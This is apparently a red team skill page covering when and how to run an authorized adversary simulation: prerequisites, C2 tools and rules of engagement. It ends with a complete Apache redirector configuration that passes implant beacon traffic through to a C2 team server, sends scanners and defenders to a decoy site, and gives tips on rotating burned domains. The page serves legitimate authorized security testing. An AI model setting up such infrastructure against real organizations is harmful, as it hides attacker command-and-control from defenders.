Executing Red Team Exercise

When to Use

  • Assessing an organization's ability to detect, respond to, and contain a realistic adversary operation
  • Testing the effectiveness of the security operations center (SOC), incident response team, and threat hunting capabilities
  • Validating security investments by simulating attacks that chain multiple vulnerabilities and techniques
  • Evaluating the organization's security posture against specific threat actors (nation-state, ransomware groups, insider threats)
  • Meeting regulatory requirements for adversary simulation (TIBER-EU, CBEST, AASE, iCAST)

Do not use:

  • without executive-level authorization and a detailed Rules of Engagement (RoE) document
  • against systems where disruption could affect safety or critical operations
  • as a replacement for basic vulnerability management (fix known vulnerabilities first)

Prerequisites

  • Executive-level written authorization with clearly defined objectives, scope, and off-limits systems
  • Red team command and control (C2) infrastructure: primary and backup C2 channels with domain fronting or redirectors
  • Operator workstations with OPSEC-hardened toolsets (Cobalt Strike, Sliver, Brute Ratel, or Mythic)
  • Threat intelligence on adversary groups relevant to the target organization for adversary emulation planning
  • Trusted agent (white cell) within the target organization who manages the exercise boundaries without alerting defenders
  • MITRE ATT&CK matrix for mapping planned and executed techniques
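The redirector mentioned under C2 infrastructure is the piece operators most often get wrong, so here is an added worked example (not part of this skill or any of the listed frameworks) of an Apache redirector that only forwards traffic matching the implant's profile to the team server and sends everything else to a decoy. The redirector hostname, the team server address 10.10.0.5, the beacon URIs, the User-Agent string and the decoy site are all assumptions chosen for illustration; match them to your own C2 profile.

```apache
# Added example: Apache (mod_ssl + mod_rewrite + mod_proxy + mod_proxy_http)
# redirector in front of a red team C2 team server.
# Only requests that match the implant's profile (URI and User-Agent) are
# proxied upstream; scanners, sandbox detonations and curious defenders get a
# 302 to a decoy site and never see the team server.
# All hostnames, paths and addresses below are placeholders (assumptions).

<VirtualHost *:443>
    # Assumed redirector domain; the implant's callback host points here
    ServerName cdn-assets.example.com

    SSLEngine on
    SSLCertificateFile    /etc/letsencrypt/live/cdn-assets.example.com/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/cdn-assets.example.com/privkey.pem

    # Upstream hop to the team server is also TLS (self-signed cert, so
    # verification is disabled; the team server is an assumed private address)
    SSLProxyEngine on
    SSLProxyVerify none
    SSLProxyCheckPeerName off

    RewriteEngine On

    # Beacon traffic: both the URI list and the User-Agent must match the
    # C2 profile (assumed values). Order matters: this rule must come first.
    RewriteCond %{REQUEST_URI} ^/(api/v2/metrics|static/js/app\.min\.js)$
    RewriteCond %{HTTP_USER_AGENT} "^Mozilla/5\.0 \(Windows NT 10\.0; Win64; x64\)"
    RewriteRule ^.*$ https://10.10.0.5:443%{REQUEST_URI} [P,L]

    # Everything else: redirect to a decoy, do not proxy, do not error out
    RewriteRule ^.*$ https://www.example.org/ [L,R=302]

    # Keep the original Host header for the team server's profile checks
    ProxyPreserveHost On

    # Log every hit with User-Agent; the white cell needs this for
    # deconfliction and the final report needs it for the timeline
    LogFormat "%h %t \"%r\" %>s \"%{User-Agent}i\"" redirector
    CustomLog /var/log/apache2/redirector.log redirector
</VirtualHost>
```

Two practitioner checks before going live: request each beacon URI with the wrong User-Agent and confirm you land on the decoy rather than the team server, and hand the redirector IP, domain and log location to the trusted agent so any defender escalation can be deconflicted without tipping off the SOC. Rotate redirectors rather than the team server if a domain is burned; the backup C2 channel in the prerequisites list should run through a separate redirector with its own profile.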
Installs: 27 | GitHub Stars: 6.2K | First Seen: Mar 15, 2026